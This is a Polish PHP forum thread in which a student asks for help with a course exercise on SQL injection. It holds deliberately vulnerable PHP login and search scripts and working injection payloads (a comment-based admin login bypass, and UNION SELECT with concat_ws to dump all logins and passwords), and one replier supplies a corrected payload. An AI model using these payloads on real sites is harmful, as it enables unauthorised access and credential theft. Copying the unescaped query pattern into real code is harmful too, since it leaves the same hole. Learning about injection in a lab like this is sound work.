Forum PHP.pl > sql injection

Pomoc - Szukaj - Użytkownicy - Kalendarz

szokmen

4.11.2010, 19:12:02

Witam,
dostałem do zrobienia ćwiczenia które mam wykonać na podstawie materiałów dołączonych do ćwiczeń. Jednak nie mogę zrobić dwóch zadań:
Pierwsze:
Używając skryptu P02.php zalogować się na konto admin wykorzystując komentowanie niechcianego fragmentu zapytania.

Skrypt P02.php;

[PHP] pobierz, plaintext 
<?php
include('cfg.php');
$z="SELECT id FROM uzytkownicy WHERE login='$login' AND haslo='$haslo'";
echo($z.'<br>');
$q=mysql_query($z);
$txt=mysql_fetch_array($q);
if (isset($txt['id'])) {big('Zalogowany! ID: '.$txt['id']);} else {big('Error');}
?>
[PHP] pobierz, plaintext

cfg.php to tylko połączenie z bazą.
Według materiałów powinno to zostać zrobione mniej więcej tak zapytanie w P02.php powinniśmy zmienić na:

[SQL] pobierz, plaintext 
SELECT  id  FROM  użytkownicy WHERE  login =&#8217;/*
[SQL] pobierz, plaintext

a w przeglądarce internetowej powinniśmy wpisać htp://adres/lokalizacja/nazwa_skryptu.php?login=admin'/* (oczywiście powinny być dwa "t" w http.)

Drugie zadanie:
Wykorzystując umiejętności z poprzednich zadań oraz funkcję PHP concat, a także skrypt P04.php wydobyć z bazy wszystkie loginy i hasła znajdujące się w bazie MySQL.

Skrypt P04.php:

[PHP] pobierz, plaintext 
<?php
include('cfg.php');
$z="SELECT login FROM uzytkownicy WHERE login LIKE '$login%' LIMIT 2";
echo($z.'<br>');
$q=mysql_query($z);
echo('<br>Znalezione rekordy:<br>');
while ($txt=mysql_fetch_array($q)){
	echo($txt['login'].'<br>');
}
?>
[PHP] pobierz, plaintext

według materiałów powinno to zostać zrobione tak, zapytanie w skrypcie P04.php zamieniamy na:

[SQL] pobierz, plaintext 
SELECT  login  FROM  użytkownicy WHERE  login LIKE &#8217;%’ AND 1=2 UNION SELECT haslo from uzytkownicy /* LIMIT 2
[SQL] pobierz, plaintext

a w przeglądarkę wpisujemy htp://adres/lokalizacja/nazwa_skryptu.php?login=%' and 1=2 union select haslo from
uzytkownicy /*

Proszę o wskazówki co robię nie tak.

Fifi209

4.11.2010, 20:57:26

w drugim ma być:

' and 1=2 union select concat_ws(':',login,haslo) /*

a w pierwszym powinno śmigać.
Zobacz czy nie masz włączonego magic_quotes

kiler129

5.11.2010, 00:41:31

Widzę, że uczysz się programować. Wyrób sobie dobre nawyki jak np. używanie PDO zamiast mysql_*().
PHP staje się coraz bardziej obiektowym językiem i niektóre funckje stają sie depraced, poleganie na np. magic quotes się niedługo skończy

Fifi209

5.11.2010, 08:37:21

Cytat(kiler129 @ 5.11.2010, 00:41:31 )

Przeczytaj jego post jeszcze kilka razy. Jak dla mnie on uczy się o atakach SQL Injection i do końca nie rozumie materiału. ;]

kiler129

5.11.2010, 12:33:06

Faktycznie

To tK jest jak się pisze po nocach kod i odłożone na forum;)

A zadanie przypomina mi takowe z tdhack wiec pytanie o rozwiazanie jest wojen hehehhe

To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.